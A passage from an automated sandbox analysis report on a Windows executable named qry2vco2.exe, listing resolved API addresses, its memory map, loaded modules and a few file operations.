| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x74f575a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x74f525e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x74f66870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x74f668c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x74f66900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x74f59700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x74f51b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77712570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x74f57920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77709920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x74f662a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x74f66590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x74f66860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x74f59680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x74f664a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x74f5a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x74f828e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x74f5a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x74f66020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x74f577b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x74f5fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x74f59a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x74f51ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x74f51da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x74f59930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x74f5a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x74f58770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x74f5fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x74f59fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x74f57910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x74f59a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x74f52dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x74f51d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x74f52b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x74f5a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x74f5a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x776ebae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x74f664f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x7756ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x7756fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x775695e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x77570680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x7756ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x7756f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x7756ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x7756ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x7756f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x775706c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x7756efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x7756f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x766dc6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x750dee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x750b55a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x750b57e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x750b9590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x750b0820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x750dfbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x76c838f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x76c9b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x76c9b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x76c87740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x76c974e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x76c9efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x76ca4ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x76c94580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x76c91540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x742f1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x742f1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x742f1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x74f5a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x74f5f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x74f57580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x74f59910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x74f66030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x74f65f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x74f65ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x74f5a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x74f5a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x776e40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x776dd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x776decf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x74f65720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x776de140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x776deb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77719990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77715540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77709dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x74f5a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x74f80a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x752c0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x74f5f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x74f5fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x74f81030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x74f5a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x74f814b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x74f5a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x74f816f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x74f59970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x75243c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x74f58710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x74f596e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-01-23 14:12:48 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #186: qry2vco2.exe
175
0
| Information | Value |
|---|---|
| ID | #186 |
| File Name | c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe |
| Command Line | qRY2vco2.exe -accepteula -c Run -y -p extract -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:15, Reason: Child Process |
| Unmonitor | End Time: 00:03:18, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xe8c |
| Parent PID | 0x614 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
C40
0x
E30
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001d0000 | 0x0028dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x002cffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x002d0000 | 0x002f9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002d0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000310000 | 0x00310000 | 0x0031ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000320000 | 0x00320000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| qry2vco2.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0061ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000620000 | 0x00620000 | 0x0071ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000720000 | 0x00720000 | 0x0083ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000840000 | 0x00840000 | 0x009c7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000009d0000 | 0x009d0000 | 0x00b50fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000b60000 | 0x00b60000 | 0x01f5ffff | Pagefile Backed Memory | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74220000 | 0x742b1fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x742f0000 | 0x742f7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x74ab0000 | 0x74abbfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74da0000 | 0x74de3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75180000 | 0x7518efff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75310000 | 0x766cefff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x766d0000 | 0x7678dfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76790000 | 0x76c6cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x77260000 | 0x772a3fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77300000 | 0x7738cfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc57b4ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x74f40000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x77550000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x766d0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x75030000 |
|
1 | |
| Load | USER32.dll | base_address = 0x76c70000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x742f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x74f660c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x74f66110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x74f587e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x74f65f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x74f64a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x74f65fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x74f5a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x74f5c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x74f66300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x74f59a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x74f661b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x74f5fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77704f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x74f59a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x74f579b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x74f5fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x74f592b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x74f5a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x74f66180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x74f63a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x74f58cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x74f65f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x74f52af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x74f578f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x74f52db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x74f52da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x74f57a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x74f5a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x74f59660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x74f5a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x74f5a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x74f587c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x74f58840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x74f57940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x74f59560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x74f669c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x74f66390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x74f81c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x74f668e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x74f66920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x74f66540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x776f5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x776f5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x74f826a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x776eda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x7770f190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x7770a200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x74f674f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x74f59fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x74f52d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x74f575a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x74f525e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x74f66870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x74f668c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x74f66900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x74f59700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x74f51b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77712570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x74f57920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77709920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x74f662a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x74f66590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x74f66860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x74f59680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x74f664a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x74f5a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x74f828e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x74f5a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x74f66020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x74f577b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x74f5fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x74f59a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x74f51ba0 |
|
1 | |
